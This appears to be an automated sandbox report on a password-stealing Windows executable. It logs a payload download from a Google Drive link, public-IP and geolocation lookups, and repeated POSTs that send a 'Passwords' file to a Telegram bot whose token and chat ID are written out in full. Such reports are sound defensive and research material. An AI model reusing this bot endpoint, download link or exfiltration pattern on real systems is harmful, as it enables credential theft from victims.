            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32d2d677c1e5Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32e58fd9cbdfHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32f83c6c0893Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd330adc3c2a0cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd331d6f3d349fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319dbf9f6463Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49770 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49831 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49843 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49735 -> 216.58.206.46:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ldZgiMZVF2Jm6I1zMoLRFfBr1vhf_sHj HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1ldZgiMZVF2Jm6I1zMoLRFfBr1vhf_sHj&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.8:49779 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ldZgiMZVF2Jm6I1zMoLRFfBr1vhf_sHj HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1ldZgiMZVF2Jm6I1zMoLRFfBr1vhf_sHj&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319daa71bf0dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.000000003651F000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000363B3000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000365BD000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.000000003651F000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000363B3000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000365BD000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036402000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.000000003651F000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000363B3000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000365BD000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036402000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036220000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036214000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000361A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: czHx16QwGQ.exe, 00000005.00000002.2747096433.0000000038C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/YQ
            Source: czHx16QwGQ.exe, 00000005.00000002.2747096433.0000000038C8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/iQ
            Source: czHx16QwGQ.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000361A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.000000003651F000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000363B3000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000365BD000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.00000000362FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: czHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: czHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: czHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005BD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Qwp
            Source: czHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005C13000.00000004.00000020.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000002.2725534398.00000000076F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ldZgiMZVF2Jm6I1zMoLRFfBr1vhf_sHj
            Source: czHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005C2F000.00000004.00000020.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000003.2308354318.0000000005C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: czHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005C2F000.00000004.00000020.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000003.2308354318.0000000005C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/B
            Source: czHx16QwGQ.exe, 00000005.00000002.2725015307.0000000005C2F000.00000004.00000020.00020000.00000000.sdmp, czHx16QwGQ.exe, 00000005.00000003.2308354318.0000000005C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ldZgiMZVF2Jm6I1zMoLRFfBr1vhf_sHj&export=download
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: czHx16QwGQ.exe, 00000005.00000002.2745533594.0000000036220000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: czHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: czHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: czHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: czHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: czHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: czHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: czHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: czHx16QwGQ.exe, 00000005.00000003.2266612181.0000000005C49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
            Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
            Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
            Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.8:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.8:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49821 version: TLS 1.2
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_0040558F GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,LdrInitializeThunk,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040558F
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 5_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,LdrInitializeThunk,GetTempPathW,GetWindowsDirectoryW,lstrcatW,LdrInitializeThunk,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,5_2_004034A5
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_00404DCC0_2_00404DCC
            Source: C:\Users\user\Desktop\czHx16QwGQ.exeCode function: 0_2_00406AF20_2_00406AF2
